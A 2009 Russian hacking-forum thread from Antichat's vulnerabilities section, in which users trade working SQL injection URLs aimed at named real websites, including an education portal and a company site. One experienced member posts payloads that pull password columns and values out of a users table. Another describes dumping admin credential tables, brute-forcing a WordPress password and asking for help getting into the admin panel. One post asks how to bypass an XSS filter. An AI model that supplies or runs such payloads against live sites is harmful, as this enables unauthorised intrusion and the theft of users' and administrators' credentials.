ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5301  
Старый 04.02.2009, 15:50
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778

Репутация: 22
По умолчанию

Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
 
Ответить с цитированием

  #5302  
Старый 04.02.2009, 16:15
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от IIAPTUZAH  
Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
А что ты тут нашел? o_0
 
Ответить с цитированием

  #5303  
Старый 04.02.2009, 16:27
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778

Репутация: 22
По умолчанию

Блин как так 2 раз незаходит Лан хоть скрин есть Он выдал мне на страницу инфы ....
 
Ответить с цитированием

  #5304  
Старый 04.02.2009, 16:35
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
А что ты тут нашел? o_0
Если разэнкодить символы 1' OR '1&# x27;='1%27 будет
Цитата:
1' OR '1'='1'
 
Ответить с цитированием

  #5305  
Старый 04.02.2009, 16:42
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Вопрос по XSS

Возсожно ли организовать уязвимость в поле color: у style ?
Фильтр " не пропускает, а если сделать так \"\ то получается такое
PHP код:
<span style="color:\&quot">1</span
 
Ответить с цитированием

  #5306  
Старый 04.02.2009, 20:43
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778

Репутация: 22
По умолчанию

Всем здрастье Вот перебрал всю таблицу а пасы ненашол
http://ts.edu.ru/schools/region/6/?town=%27+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(%27% 20DBSchool%27,%27school_Need%27,%27school_News%27, %27school_Photo%27,%27school_Teachers%27,%27School _Leavers%27,%27index_Epigraph%27,%27index_bgImage% 27,%27site_news%27,%27SchoolTypes%27,%27blag_News% 27,%27SchoolForms%27,%27vote_Main%27,%27SchoolVids %27,%27v_FullSchoolInfo%27,%27vote_Answers%27,%27R egions%27,%27TownTypes%27,%27school_Main%27,%27%D0 %E0%F1%EF%F0%E5%E4%E5%EB%E5%ED%E8%E5%20%F8%EA%EE%E B%20%EF%EE%20%F0%E5%E3%E8%EE%ED%E0%EC%27,%27Images %27,%27tmpImages%27,%27HelpTypes%27,%27Forums%27,% 27school_History%27,%27sponsor_offers%27,%27Countr ies%27,%27Educations%27,%27Users%27,%27syssegments %27,%27sysconstraints%27,%27Admin_schools%27,%27dt properties%27,%27Admin_Site%27,%27v_School_Need_Fu ll%27,%27v_Sponsor_Offers_Full%27))--
 
Ответить с цитированием

  #5307  
Старый 04.02.2009, 20:54
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

2 IIAPTUZAH
Cочуствую

зы: а в Users\Admin_Site разве ничего нет??
как вариант - тут нет админки\пассы не в этой базе
 
Ответить с цитированием

  #5308  
Старый 04.02.2009, 20:56
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778

Репутация: 22
По умолчанию

в админ сайт токо user_id прочитал это:http://forum.antichat.ru/thread30501.html Но там по дркгому и я непонял как извлекать инфу Обясните
 
Ответить с цитированием

  #5309  
Старый 04.02.2009, 21:56
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

военная тайна: column_name like '%pass%'
ну или кнопкой:
Цитата:
http://ts.edu.ru/schools/region/6/?town='+or+1=(select+top+1+cast(table_name+as+char )%2bcast(column_name+as+char)+from+information_sch ema.columns+where+column_name+like+'%pass%')--
Цитата:
http://ts.edu.ru/schools/region/6/?town='+or+1=(select+top+1+password+from+users)--
 
Ответить с цитированием

  #5310  
Старый 04.02.2009, 22:06
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

Вобщем столкнулся с интересным сайтом =) либо я где то ошибаюсь либо все так и есть! Вобщем есть SQL вот тут:

hidglobal.com/pr.php?id=-1000+UNION+SELECT+1,2,version(),4,5,6,7--
Версия mysql выше 5 и с помощью SIPT4 я прочитал бд(вот самое интересное):

Database [admin]
Table [administrators ( Rows)]
username
password
Database [blogpriv]
Table [wp_users ( Rows)]
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
Database [event_breakouts]
Table [admin ( Rows)]
admin_id
admin_name
admin_pwd
Database [hid_productselector]
Table [hid_administrator ( Rows)]
administrator_username
administrator_password
нашел админку блога(вордпресс) /blog/wp_login.php из бд прочитал пасс, сбрутил его, ввел, а он не подходит =) и больше ничего из админок не нашел! =\ только еще что то order.hidglobal.com но и тут неудача =\ помогите разобраться, а то уже голова кругом идет
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ